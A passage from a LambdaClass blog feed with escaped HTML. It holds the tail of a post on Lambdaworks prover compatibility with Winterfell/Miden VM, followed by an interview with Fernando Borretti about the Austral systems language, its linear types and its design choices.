&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;};&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let trace =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    MidenVMQuadFeltAir::convert_winterfell_trace_table(winter_trace.main_segment().clone());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let proof = Prover::&amp;lt;MidenVMQuadFeltAir&amp;gt;::prove(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;trace,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;pub_inputs,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;lambda_proof_options,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    QuadFeltTranscript::new(&amp;amp;[]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;.unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Finally, to verify it, it is enough to call the verify function with the proof and the public inputs:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Verifier::&amp;lt;MidenVMQuadFeltAir&amp;gt;::verify(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &amp;amp;proof,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &amp;amp;pub_inputs,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &amp;amp;lambda_proof_options,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            QuadFeltTranscript::new(&amp;amp;[]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        )&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;benchmarks&quot;&gt;Benchmarks&lt;&#x2F;h3&gt;
&lt;p&gt;To run the Fibonacci Miden benchmark, run:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cargo bench&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;To run it with parallelization, run:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cargo bench --features stark-platinum-prover&#x2F;parallel,winter-prover&#x2F;concurrent&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Several PRs added support for extension fields for the prover and verifier (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;716&quot;&gt;716&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;717&quot;&gt;717&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;724&quot;&gt;724&lt;&#x2F;a&gt;). These allow us to represent the trace in the base field (which has faster operations and lower memory use) and to have a separate frame for the auxiliary trace over the extension. The constraint calculations were also modified, for example to operate on elements from different fields.&lt;&#x2F;p&gt;
&lt;p&gt;There is also a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;blob&#x2F;main&#x2F;winterfell_adapter&#x2F;src&#x2F;examples&#x2F;miden_vm.rs&quot;&gt;Miden adapter&lt;&#x2F;a&gt; containing example tests, such as the Fibonacci and README examples.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;adding-periodic-columns&quot;&gt;Adding periodic columns&lt;&#x2F;h2&gt;
&lt;p&gt;Winterfell also uses periodic columns, so we had to add them and test their use in this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;685&#x2F;files&quot;&gt;PR&lt;&#x2F;a&gt;. These are useful for hash function calculations or for supplying constants that the constraints need.&lt;&#x2F;p&gt;
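&lt;p&gt;The idea behind a periodic column can be sketched as follows (a hypothetical illustration, not the Lambdaworks API): only a short cycle of constants is stored, and the full-length column is that cycle repeated to the trace length, so the value at any step is a modular lookup.&lt;&#x2F;p&gt;

```rust
// Hypothetical illustration (not the Lambdaworks API): a periodic column
// stores only a short cycle of constants; the value at any trace step is
// obtained by indexing the cycle modulo its length.
fn periodic_value(cycle: [u64; 4], step: usize) -> u64 {
    cycle[step % cycle.len()]
}

fn main() {
    // e.g. a selector that is active on every 4th row of the trace
    let cycle = [1, 0, 0, 0];
    let mut column = [0u64; 8];
    for step in 0..8 {
        column[step] = periodic_value(cycle, step);
    }
    assert_eq!(column, [1, 0, 0, 0, 1, 0, 0, 0]);
}
```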
&lt;h2 id=&quot;conclusions&quot;&gt;Conclusions&lt;&#x2F;h2&gt;
&lt;p&gt;Lambdaworks has been growing over the last year. We have added several proof systems and commitment schemes to give users an easy-to-use library to experiment with and build applications. We have also been working to make the provers compatible with our libraries, giving users a drop-in replacement. We decided to work towards compatibility with Winterfell&#x2F;Miden VM since we like many of its design choices and the work done to generalize AIRs in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;0xPolygonMiden&#x2F;air-script&quot;&gt;AIRscript&lt;&#x2F;a&gt;. We will continue improving the performance of our provers and supporting new proof systems as part of our roadmap.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Interview with Fernando Borretti about Austral - a systems programming language with linear types</title>
          <pubDate>Sun, 24 Dec 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/austral/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/austral/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/austral/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;It has been many moons since we interviewed a language creator, and we are very excited to present a few questions to, and share the answers from, Fernando Borretti, the creator of the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;austral-lang.org&#x2F;&quot;&gt;Austral&lt;&#x2F;a&gt; (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;austral&#x2F;austral&quot;&gt;Github&lt;&#x2F;a&gt;) language. As it says on the tin:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;“&lt;strong&gt;Austral&lt;&#x2F;strong&gt;  is a new systems programming language. It uses linear types to provide memory safety and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Capability-based_security&quot;&gt;capability-secure code&lt;&#x2F;a&gt;, and is designed to be simple enough to be understood by a single person, with a focus on readability, maintainability, and modularity.”&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;Just as Pascal introduced modules, and Lisp garbage collection, to a generation of programmers, Rust introduced using the type system to enforce rules on resource usage &lt;em&gt;into the mainstream&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;It has sparked a very interesting and ongoing discussion about memory usage, resource handling, and linear type systems that is inspiring many other languages. We ourselves at Lambda hope to present our own take on this in the future.&lt;&#x2F;p&gt;
&lt;p&gt;Without further ado, here is the interview.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why did you create Austral? Doesn’t Rust solve the same type of problems?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I think it was Manuel Simoni who said: the most important thing about a programming language is how it makes you feel.&lt;&#x2F;p&gt;
&lt;p&gt;And to many people that sounds like a joke but I take it very seriously. Programming language design is an affective thing. I stopped working with Python because it made me feel like I was always standing atop a house of cards in a strong wind. It made me feel anxious. JavaScript is a lot like that.&lt;&#x2F;p&gt;
&lt;p&gt;There’s something akin to the extended phenotype in biology for programming languages: beyond the core language and the standard library you have the “extended language”, the tooling, the ecosystem, the community, the culture. And all of those things come together and define your experience of the language. Some languages like OCaml have a lot of technical merit, but the tooling is horrible and the community has no interest in improving, and so you persist in using it for its technical beauty and then inevitably burn out. And the further away from the core language you go, the less control there is (it’s hard to socially engineer an entire language community) but there’s a lot of things the language creators have control over, like setting the tone of the community, expectations around documentation, the quality of the tooling.&lt;&#x2F;p&gt;
&lt;p&gt;I wanted a language (and an extended language) that I would feel happy using. I wanted a small, simple language. Simple in the sense of Kolmogorov complexity: it fits in your head and there aren’t reams and reams of edge cases you need to understand. I wanted a slow-moving, conservative language, in the spirit of Common Lisp, where code bitrots very very slowly and you can confidently write code today knowing it will compile and run in thirty or more years. And I want to build an extended language to support that: high quality tooling and high quality docs to set the tone and create a community where people value quality, taste, and craftsmanship.&lt;&#x2F;p&gt;
&lt;p&gt;Re: Rust, I like Rust a lot. I work with it professionally. The tooling is a joy to use (after years of being tormented by pip and dune and pretty much everything else). And it’s infinitely better designed than most other languages you can find. I will even defend async.&lt;&#x2F;p&gt;
&lt;p&gt;But Rust is a very pragmatic language, and the problem with pragmatism is that it never ends*. Pragmatism has no natural stopping point. Rust is already pretty complex and I expect it will continue to grow as people demand more from the language. And the thing about programming languages is you can’t really take features off. And this isn’t necessarily wrong: I don’t think Rust would be as successful if it didn’t have a thousand little ergonomic features, and certainly if it didn’t have async there’d be a lot less of an impetus to adopt it for building servers.&lt;&#x2F;p&gt;
&lt;p&gt;There’s two ways to build a general-purpose language: one is to make it so that it is not specialized to any one thing, and that’s the Austral approach; and one is to make it specialized to every one thing. And things tend to evolve towards the latter, because large companies – the ones whose employees sit on the boards of programming language foundations, and the ones who pay people to work on the compilers and tooling and such – have very specific needs, and they’re always lobbying to have the language solve their specific problem. So languages grow and accumulate all these features because Google needs to reduce global latency by 0.02%.&lt;&#x2F;p&gt;
&lt;p&gt;*Philip K. Dick originally said this of introspection, and he was right.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Which languages inspired you the most?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Rust gets a lot of credit because it’s the only industrial language to have anything like linear types.&lt;&#x2F;p&gt;
&lt;p&gt;Cyclone, which also inspired Rust, was a research language, a better dialect of C, didn’t take off but they published a few papers about it. There were very interesting ideas about region-based memory management there.&lt;&#x2F;p&gt;
&lt;p&gt;Haskell for type classes done right. Haskell 98 type classes in particular are a jewel of good design. Standard ML for its module system. Ada for the syntax, module system, and ideas about security.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is a linear type system, why is it useful? What type of software do you think that can be improved by using a linear type system?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I’ve written a bit about this in different places:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;borretti.me&#x2F;article&#x2F;type-systems-memory-safety&quot;&gt;https:&#x2F;&#x2F;borretti.me&#x2F;article&#x2F;type-systems-memory-safety&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;borretti.me&#x2F;article&#x2F;how-australs-linear-type-checker-works&quot;&gt;https:&#x2F;&#x2F;borretti.me&#x2F;article&#x2F;how-australs-linear-type-checker-works&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;borretti.me&#x2F;article&#x2F;introducing-austral&quot;&gt;https:&#x2F;&#x2F;borretti.me&#x2F;article&#x2F;introducing-austral&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;austral-lang.org&#x2F;linear-types&quot;&gt;https:&#x2F;&#x2F;austral-lang.org&#x2F;linear-types&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Part of me wants to consolidate these into one “definitive” explanation, but another part thinks it’s valuable to have different approaches to the same idea. So I have a number of different elevator pitches:&lt;&#x2F;p&gt;
&lt;p&gt;One way to think about it is linear types let you enforce protocols at compile time. There’s two kinds of values in programming: plain data and protocol handles. The latter are things like sockets, file objects, database handles, IPC channels. In languages with manual memory management they include heap-allocated objects.&lt;&#x2F;p&gt;
&lt;p&gt;These have to conform to a particular protocol, with the right state transitions. No double-free (you can’t free memory twice) and no use-after-free. Linear types allow you to enforce this at compile time. This is the main benefit: you get manual memory management with high performance and without safety footguns.&lt;&#x2F;p&gt;
&lt;p&gt;But you can also make your own protocols for your own types and enforce higher-level API contracts than what a normal type system allows.&lt;&#x2F;p&gt;
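&lt;p&gt;The consume-on-use idea can be sketched in Rust, which the interview names as the closest industrial relative of linear types. This toy &lt;code&gt;Handle&lt;&#x2F;code&gt; type is hypothetical (not from any library): because &lt;code&gt;close&lt;&#x2F;code&gt; takes &lt;code&gt;self&lt;&#x2F;code&gt; by value, calling it a second time, or using the handle after closing it, is a compile-time error.&lt;&#x2F;p&gt;

```rust
// Toy example of protocol enforcement via move semantics (hypothetical type,
// not from any library): a handle whose `close` consumes it, so the
// "double-free" and "use-after-free" states are unrepresentable.
struct Handle { id: u32 }

impl Handle {
    fn open(id: u32) -> Handle { Handle { id } }

    // Taking `self` by value moves the handle into `close`: afterwards the
    // compiler rejects any further use of it, including a second `close`.
    fn close(self) -> u32 { self.id }
}

fn main() {
    let h = Handle::open(7);
    let id = h.close();
    assert_eq!(id, 7);
    // h.close();   // would not compile: `h` was moved by the previous call
}
```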
&lt;p&gt;Another way to think about it is that linear types make values work like real-world objects. In reality things can only ever be in one place. They move, but can’t be copied. In computers, copying is the primitive operation. Values can be aliased because pointers are unrestricted.&lt;&#x2F;p&gt;
&lt;p&gt;It turns out a lot of the problems with mutation are really problems with aliasing. And when you restrict pointer aliasing through linear types, you get referential transparency with pervasive mutation. You get code that is easy to reason about and very high performance.&lt;&#x2F;p&gt;
&lt;p&gt;As for what kinds of software could be improved: mainly, anything that manually-manages memory or uses external resources that need to respect protocols. That’s the main improvement. But when you start to think about designing APIs with linear types from the ground up, it becomes a lot more general, because a whole lot of APIs can be improved by using linear types to enforce high-level contracts and protocols.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What are the disadvantages of using a linear type system? Do you think that developer experience or the learning curve are necessarily impacted?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;There are two main disadvantages:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Explicitness and verbosity: you have to call destructors by hand, and a lot more things require destruction (e.g. any string).&lt;&#x2F;li&gt;
&lt;li&gt;Linear types are incompatible with traditional exception handling techniques: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;borretti.me&#x2F;article&#x2F;linear-types-exceptions&quot;&gt;https:&#x2F;&#x2F;borretti.me&#x2F;article&#x2F;linear-types-exceptions&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;&lt;strong&gt;Your post explaining the linearity checker details the implementation. Some modern languages are exploring implementing their type systems as rule sets in logic inference engines e.g. Datalog. Do you have thoughts on this trend?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I don’t know enough logic programming to implement the type checker in it. There’s this Racket tool called Redex which I’m aware of but haven’t played with; it basically lets you write typing judgments in Gentzen notation (like PLT papers) but have those judgments type-checked. Which is a vast improvement over writing the type system in LaTeX.&lt;&#x2F;p&gt;
&lt;p&gt;Another thing is that the type system is not too complicated. The goal is to be simple in the C. A. R. Hoare sense of “simple enough that there are obviously no bugs”.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Incremental compilation is also a hot topic today. In your post explaining the design of the Austral compiler you mention that for simplicity it does batch compilation. Have you considered incremental compilation an interesting feature or do you see it as an implementation detail?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Incremental and separate compilation are a must have in a production compiler but I think you can live without them in the early days, particularly because there’s just not that much code written in the language in the first place. You could take the entire ecosystem, 10x it in volume, and still not suffer from slow compile times.&lt;&#x2F;p&gt;
&lt;p&gt;I think this is an area where there’s room for improvement relative to other languages like Rust, because in Austral the module is the compilation unit, while in Rust the crate is the compilation unit. In Rust, all the modules that make up a crate are loaded at once, and only then compiled, so you can have e.g. circular dependencies between modules within a crate. The problem is build times are the main complaint people have about Rust, and people have to turn to bad solutions like manually splitting codebases into multiple crates.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;In your introduction to Austral, you mention that type inference is an anti-feature. Can you expand on what led you to this decision?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I feel that type inference is a science experiment that broke its cage and escaped the lab, to the detriment of many people. As in, it should have remained an academic curiosity.&lt;&#x2F;p&gt;
&lt;p&gt;The fundamental problem is that type inference doesn’t know whether the input you give it is correct or a mistake, but it will use it as a constraint in inference anyways. I had this problem in OCaml constantly: I’d make a mistake where in Java I’d get an error message saying “you made a mistake”, while in OCaml the compiler would make a best-effort inference, propagating my mistake upwards and sideways and every which way, and then I’d get an incomprehensible type error, sometimes many tens or hundreds of lines removed from the place where I made the actual mistake. Sometimes the only solution to such errors is to start adding type annotations (to function signatures, to variables) to constrain the inference process, and this can take a long time. And then you find the error and it was the most trivial thing, and in a less bigbrained language it would not have happened in the first place.&lt;&#x2F;p&gt;
&lt;p&gt;The next problem is languages that infer too much. Again, in OCaml (and unlike Rust) you can leave the parameters to a function unannotated. You save microseconds of typing, and for the rest of the lifetime of that codebase you will spend multiple minutes trying to figure out what the type of something is. And you can say, well, simply annotate all your function signatures. But that’s why languages have to have hard rules: if something is optional, people will take the shortcut and not do it all the time.&lt;&#x2F;p&gt;
&lt;p&gt;So type inference in ML family languages is a failed idea because you end up annotating the types anyways: you have to annotate the types of functions for documentation, and you frequently end up annotating the types of local variables for both readability and to constrain the type inference engine and make the errors easier. It’s just this really frustrating, circuitous way of doing what in Java you’d be forced to do in the first place. And I see people using VS Code with an LSP set up to display the types of the variables over the code and think, well, why not just have them written? Then you can read the code outside your dev environment, like in a GitHub diff for example.&lt;&#x2F;p&gt;
&lt;p&gt;I’ve found that type inference is only useful in a very narrow set of circumstances where type information doesn’t flow strictly downwards and annotations would be cumbersome. The best example of this is the &lt;code&gt;Option&lt;&#x2F;code&gt; type. If you have this in Rust:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;enum Option&amp;lt;T&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Some(T),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    None,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Then in the &lt;code&gt;Some&lt;&#x2F;code&gt; constructor, there’s no need for inference, because type information flows downwards: &lt;code&gt;Some: T -&amp;gt; Option&amp;lt;T&amp;gt;&lt;&#x2F;code&gt;. But without type inference the &lt;code&gt;None&lt;&#x2F;code&gt; constructor is harder: it doesn’t take a value, so in a language without type inference, you have to tell the compiler which type should be used in place of &lt;code&gt;T&lt;&#x2F;code&gt;. But a general type inference engine is such a complex piece of machinery for such a narrow use case.&lt;&#x2F;p&gt;
&lt;p&gt;And then there’s the performance cost. The more advanced the type system, the more expensive inference becomes. There’s also the fact that type inference wastes a lot of academic effort. Academic papers on PLT will introduce a new type system, and then spend pages and pages describing the type reconstruction algorithm. And I’m like, this is the least interesting part of it! Let me annotate things manually and show me what this thing can do to solve real problems!&lt;&#x2F;p&gt;
&lt;p&gt;So in Austral type information flows in one direction only, and variables and everything require annotations everywhere. The cost is you spend unobservable extra milliseconds writing. The gain is the code is instantly more readable and you never again have to deal with weird inference bugs.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Macros are also mentioned as an anti-feature, but in your writings you mention Lisp. Do you think there are valid use cases, in general or in Austral, for metaprogramming, and for which kinds of metaprogramming?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I used to write Common Lisp a lot. And macros work decently well in CL*. One of the things that attracted me to Lisp is that every programmer is a language designer. I used to think that was a very good thing: you can implement language features in a few seconds that Java programmers have been begging for in mailing lists for years. But then I saw what people do with macros and changed my mind.&lt;&#x2F;p&gt;
&lt;p&gt;This is part of a general pattern that when I was younger I wanted expressive power, and I was attracted to Common Lisp because in Common Lisp you can wave your magic wand and change the world. But after 10 years of cleaning up people’s horrible code I realize what I want are fewer nightmares. Macros make everyone a language designer, and that, I realize, is a very bad thing because most people should not be anywhere near language design. Macros might work in a language that is only used by like, insane PL geniuses who also have great communication skills and write lots of docs, but “this feature can only be used by discerning geniuses with great taste” is not sustainable in the real world.&lt;&#x2F;p&gt;
&lt;p&gt;What do people use macro systems (and related things like Java-style annotations) for? Largely to build nightmares: codebases shot through with magic, where every type has like seven different annotations involving serialization, RPC, SQL mappings and the like. The code you see on the page is not what’s running: it’s an input to a vast, ill-defined, ad-hoc programming language made up of third-party macros that transforms the code in unpredictable ways. Errors become impossible to trace because nobody can tell you concretely what control flow looks like. Changes to the codebase become unpredictable.&lt;&#x2F;p&gt;
&lt;p&gt;So macros are kind of a bait and switch. The bait is, “it would be nice to have a shorthand way to write this common code”. The switch is you end up with a codebase nobody can understand.&lt;&#x2F;p&gt;
&lt;p&gt;And the solution is build-time code generation. It’s a lot like macros, but you can inspect the generated code, commit it to version control, debug it, and it is cleanly separate from the rest of the code you write.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * I wrote about why here: &amp;lt;https:&#x2F;&#x2F;borretti.me&#x2F;article&#x2F;why-lisp-syntax-works&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;strong&gt;The capability-based security description sounds strikingly similar to OpenBSD’s &lt;code&gt;pledge&lt;&#x2F;code&gt;. Did you take inspiration from them?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;This is one area where I wish I’d kept something like a lab notebook while iterating on the language design. It would be invaluable to be able to go back and see what I was aware of and when, which papers I read and such. I think I was aware of pledge and how it works at the time. I really like the pledge API. Linux and FreeBSD capabilities are hellishly complicated when compared to the bare-bones simplicity of pledge. Austral’s capability security is similar to pledge in that in both systems, you start with infinite capabilities, and you can then surrender those capabilities, irreversibly, one at a time. But Austral’s system is more granular because it doesn’t rely on a hardcoded list of syscalls; rather, you get pledge() at the value level: you can pledge individual files and other objects.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is the most difficult part of designing a new programming language like Austral?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I should say building a community, getting people interested, but honestly the most frustrating thing has been writing the compiler.&lt;&#x2F;p&gt;
&lt;p&gt;There’s this tension between, on the one hand, you want the simplest, most MVP, most prototype bootstrapping compiler so you can get to the stage where you can write real running programs and actually start playing with the language. That tells you a lot about ergonomics, about possible soundness issues. Because when things are vague and ill-defined they’re always great, it’s only when you concretize things (by implementing them) that you start to notice the flaws and the tradeoffs.&lt;&#x2F;p&gt;
&lt;p&gt;But if the compiler is too MVP you will have bugs you can’t easily figure out, because the error reporting is very poor for example. Compilers are really uniquely hellish to test and debug.&lt;&#x2F;p&gt;
&lt;p&gt;So you’re always changing course between “build a simple MVP compiler so I can quickly iterate on it” and “build something with production-grade diagnostics and error reporting”.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Are you planning on building a community or userbase? How do you think you can generate momentum to attract Rust or C programmers to develop with Austral?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I have a little Discord. I want to do more work to have something more substantial especially around the standard library and build tooling before spending much more effort on marketing. I think a lot of programmers are very tired of language churn and framework churn and library churn, and the idea of a small, simple, conservative, slow-moving language is appealing. Here’s a thing you can learn in an afternoon, and the code you write will compile and run thirty years from now, and you won’t have to jump ship in horror in a decade.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Do you think you can reuse existing tooling from other languages (like gdb, or rust-analyzer)? What is the state of the standard library and how do you see it evolving?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The current compiler spits out C. I don’t want that to become a trait of the language (“Austral compiles to C”), since it’s just an implementation detail of the compiler. So gdb and valgrind should be usable.&lt;&#x2F;p&gt;
&lt;p&gt;rust-analyzer, I doubt it. It’s a huge thing and is essentially the most complex parts of a compiler frontend specifically for Rust.&lt;&#x2F;p&gt;
&lt;p&gt;I think it would be a good idea to write the production compiler with a view towards making it usable also as an LSP.&lt;&#x2F;p&gt;
&lt;p&gt;The standard library is very minimal: simple containers and typeclasses. I see myself making small additions to it. A lot of people hate dependencies but I’m a big believer in lots of small libraries actually, so I like the idea of the standard library being just code that is either “eternal” (e.g. a resizable array type) or pervasive (e.g. date and time) or binding some platform-specific thing (e.g. file I&#x2F;O).&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Is interoperability with other languages (e.g. FFI) part of the roadmap? How would it interact with linear types and capabilities?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Interoperability with C is already there. That’s the most useful one because the C calling convention is basically the lingua franca of every language.&lt;&#x2F;p&gt;
&lt;p&gt;Some languages advertise e.g. automatic interoperability with C++. That is vastly more effort and I think it’s entirely misguided. e.g. the Clasp compiler for Common Lisp was built essentially so the author could access C++ libraries that use templates and such from Common Lisp. It’s a tremendous amount of effort when you can simply write a light extern C wrapper around the C++ code you need (in Common Lisp you can even automate much of this). So I’m not too worried about C++ interop. In the future we’ll just have an LLM port the entire C++ codebase over no problem.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What are your future plans for Austral? Do you plan to grow the language and add new features like concurrency primitives?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Standard library, build system and package manager, better docs. That’s the first thing.&lt;&#x2F;p&gt;
&lt;p&gt;I’m procrastinating on concurrency models because I don’t know enough about them, and I don’t want to prematurely specialize the language to an approach that might not pan out. Go has green threads and goroutines and that hasn’t worked out for them, the design gives up a lot of performance. OCaml has green threads now and that seems to be working out for them so far. I think Rust-style async is very unfairly maligned, but it also has practical problems in that, because of the way it interacts with lifetimes, everyone ends up putting all of their shared resources under reference-counted pointers. And so in theory the perf ceiling is very high but in practice people will leave a lot of performance on the table to get code that can be feasibly written and refactored.&lt;&#x2F;p&gt;
&lt;p&gt;So I’m happy to sit back and let the world define itself for me, and when there’s a clear and compelling right thing to do, I’ll implement it in Austral in the simplest, most orthogonal way possible.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
